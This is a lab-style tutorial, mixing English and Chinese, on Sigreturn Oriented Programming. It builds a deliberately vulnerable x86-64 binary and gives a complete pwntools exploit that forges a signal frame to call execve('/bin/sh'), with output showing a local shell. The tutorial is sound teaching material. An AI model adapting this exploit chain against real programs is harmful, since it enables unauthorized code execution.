SROP

Sigreturn Oriented Programming (SROP) is an exploitation technique for UNIX-like systems (introduced in [1] as "a novel technique for exploits and backdoors"): the attacker writes a fake signal frame onto the stack and invokes the `sigreturn` system call, and the kernel then loads every general-purpose register — including `rip` and `rsp` — from that frame without verifying that it was produced by a real signal delivery. The whole chain therefore needs only a way to set `rax` and one `syscall` instruction. 具体见[1]。

漏洞程序

  1. vuln程序
"""Build the deliberately vulnerable target used by the SROP demo.

The program is a single `read(0, rsp - 8, 500)` followed by `ret`, plus a
`pop rax; ret` gadget.  Because the read starts 8 bytes *below* rsp, the
second 8 bytes of input land exactly in the slot that `ret` pops, so the
caller controls the first return address with no further setup.
"""
from pwn import *

# Both settings must be in place before ELF.from_assembly() so the source
# below is assembled for x86-64 Linux.
context.update(arch='amd64', os='linux')

# NOTE(review): rax is never set before `syscall`; this presumably relies on
# rax being 0 (SYS_read) at process entry -- nothing here guarantees it.
# rdi = 0 is stdin, rsi = rsp - 8 is the destination, rdx = 500 is the
# maximum read length (the exploit payload must fit in it).
VULN_ASM = '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx, 500;
    syscall;
    ret;

    pop rax;
    ret;
'''

# Fixed load address (no PIE), so the gadget addresses are stable across
# runs: `syscall; ret` ends up at 0x41015 and `pop rax; ret` at 0x41018.
elf = ELF.from_assembly(VULN_ASM, vma=0x41000)
elf.save('vuln')
└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
  2. 追加 /bin/sh 字符串：用 `echo -en` 把 "/bin/sh\0" 写到文件末尾，`strings -tx` 显示它的文件偏移是 0x1238（exploit 中以 `elf.address + 0x1238` 引用）
┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln

┌──(kali㉿kali)-[~/exploits/srop]
└─$ strings -tx vuln |grep /bin/sh
   1238 /bin/sh

pwn

  1. 查看 gadget：需要 `syscall; ret`（0x41015）和 `pop rax; ret`（0x41018）；rt_sigreturn 的系统调用号是 15（见上面的 unistd_64.h）
$ objdump -d -M intel vuln
vuln:     file format elf64-x86-64
Disassembly of section .shellcode:

0000000000041000 <__start>:
   41000:	48 c7 c7 00 00 00 00 	mov    rdi,0x0
   41007:	48 89 e6             	mov    rsi,rsp
   4100a:	48 83 ee 08          	sub    rsi,0x8
   4100e:	48 c7 c2 f4 01 00 00 	mov    rdx,0x1f4
   41015:	0f 05                	syscall
   41017:	c3                   	ret
   41018:	58                   	pop    rax
   41019:	c3                   	ret
  2. exploit 脚本
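"""SROP exploit for ./vuln: one overflow -> rt_sigreturn -> execve("/bin/sh").

Chain (all addresses are fixed because the target is not PIE, vma=0x41000):
  1. 8 bytes of filler: the target reads into rsp - 8, so these land below
     the slot that `ret` pops;
  2. `pop rax; ret` with 0xf -> rax = SYS_rt_sigreturn;
  3. `syscall` -> the kernel "returns from a signal" and loads every
     register from the fake ucontext that follows on the stack;
  4. that frame sets rax = SYS_execve, rdi = &"/bin/sh", rsi = rdx = 0 and
     rip = syscall, so the next instruction executed is execve("/bin/sh").
"""
from pwn import *

# context.binary sets arch/os from the ELF, which SigreturnFrame() needs;
# process() with no arguments then launches context.binary.
elf = context.binary = ELF('./vuln', checksec=False)
p = process()

# "/bin/sh\0" was appended to the file at offset 0x1238 (see `strings -tx`).
# Using elf.address + file offset as its virtual address works here only
# because the appended bytes sit inside a page the loader already maps;
# re-check the offset after any rebuild of ./vuln.
BINSH = elf.address + 0x1238
POP_RAX = 0x41018           # pop rax; ret
SYSCALL_RET = 0x41015       # syscall; ret

# rt_sigreturn restores all registers from this frame without verifying
# that the kernel put it there -- that is the SROP primitive. Only the
# registers execve needs are set; rsp and the rest stay 0, which is fine
# because execve replaces the address space on success.
frame = SigreturnFrame()
frame.rax = 0x3b            # SYS_execve
frame.rdi = BINSH           # pointer to "/bin/sh"
frame.rsi = 0x0             # argv = NULL
frame.rdx = 0x0             # envp = NULL
frame.rip = SYSCALL_RET     # resume at `syscall` with the registers above

payload = b'A' * 8          # fills rsp-8 .. rsp-1
payload += p64(POP_RAX)     # popped by the target's `ret`
payload += p64(0xf)         # SYS_rt_sigreturn
payload += p64(SYSCALL_RET) # sigreturn runs; kernel reads the frame below
payload += bytes(frame)

# The target reads at most 500 bytes (`mov rdx, 500` in vuln). A longer
# payload would truncate the frame and the chain would fail silently, so
# refuse to send it rather than debug a mystery crash.
READ_SIZE = 500
if len(payload) > READ_SIZE:
    raise ValueError("payload is %d bytes, vuln reads only %d"
                     % (len(payload), READ_SIZE))

# sendline() appends '\n'; it arrives after the frame and is never used.
p.sendline(payload)
p.interactive()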

pwn success

┌──(kali㉿kali)-[~/exploits/srop]
└─$ python exploit.py      
[+] Starting local process '/home/kali/exploits/srop/vuln': pid 1960175
[*] Switching to interactive mode
$ who
kali     pts/0        Feb 13 20:48 (192.168.44.1) 

参考

  1. [1] Sigreturn Oriented Programming Attack